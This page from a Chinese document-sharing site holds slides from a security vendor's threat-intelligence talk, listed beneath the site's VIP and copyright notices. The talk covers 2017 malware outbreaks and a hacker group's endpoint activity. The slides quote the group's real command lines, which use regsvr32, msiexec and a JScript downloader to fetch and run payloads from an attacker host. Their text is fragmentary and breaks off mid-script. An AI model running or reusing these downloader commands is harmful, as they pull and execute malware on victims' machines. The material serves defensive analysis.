- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
代码战争的主阵地——来自终端的威胁情报详述
代码战争的主阵地 :来自终端的威胁情报详述
周 军
火绒安全联合创始人
• 2017/2/2 :”Mirai”物联网病毒变种
– /newish-mirai-spreader-poses-new-risks/77621/
• 2017/4/14 :微软针对”Shadow Brokers”泄漏漏洞发布Blog
– /msrc/2017/04/14/protecting-customers-and-evaluating-risk/
• 2017/5/12 :勒索病毒”Wannacry”席卷全球
– / msrc/2017/05/12/customer -guidance-for-wannacrypt-attacks/
• 2017/5/15 :报道称发现利用”EternalBlue”入侵服务器挖矿
– /us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-
doublepulsar
• 2017/5/17 :报道称中国黑客利用”EternalBlue”传播后门
– /eternalblue-exploit-actively-used-deliver-remote-access-trojans/
• 2017/6/27 :新”Petya”病毒通过泄漏漏洞卷土重来
– /wiki/Petya_(malware)
“隐匿者”
一个“低调”的黑客组织
终端威胁信息感知
远程脚本运行 C:\Windows\System32\ regsvr32.exe /u /s /i:http://js.mykings.top :280/v.sct scrobj.dll
运行远程MSI安装包 C:\Windows\System32\ msiexec.exe /i http://js.mykings.top :280/helloworld.msi /q
cmd /c echo=1/*nulc:\az1.batecho @clsc:\az1.batecho echo offc:\az1.batecho call :http
/js/a.exe c:\a.exec:\az1.batecho start c:\a.exec:\az1.batecho :httpc:\az1.batecho
cscript -nologo -e:jscript %~f0 %~1 %~2c:\az1.batecho goto :eofc:\az1.batecho */c:\az1.batecho var
iLocal,iRemote,xPost,sGet;c:\az1.batecho iLocal =WScript.Arguments(1);c:\az1.bat echo iRemote =
WScript.Arguments(0);c:\az1.bat echo iLocal=iLocal.toLowerCase();c:\az1.batecho xPost = new
隐藏执行可疑脚本
ActiveXObject(MSXML2.XMLHTTP.3.0);c:\az1.batecho xPost.Open(GET,iRemote,0);c:\az1.batecho
xPost.Send();c:\az1.batecho sGet = new ActiveXObject(ADODB.Stream);c:\az1.batecho sGet.Mode =
3;c:\az1.batecho sGet.Type = 1;c:\az1.bat echo sGet.Open();c:\az1.bat echo
sGet.Write(xPost.responseBody);c:\az1.batecho
文档评论(0)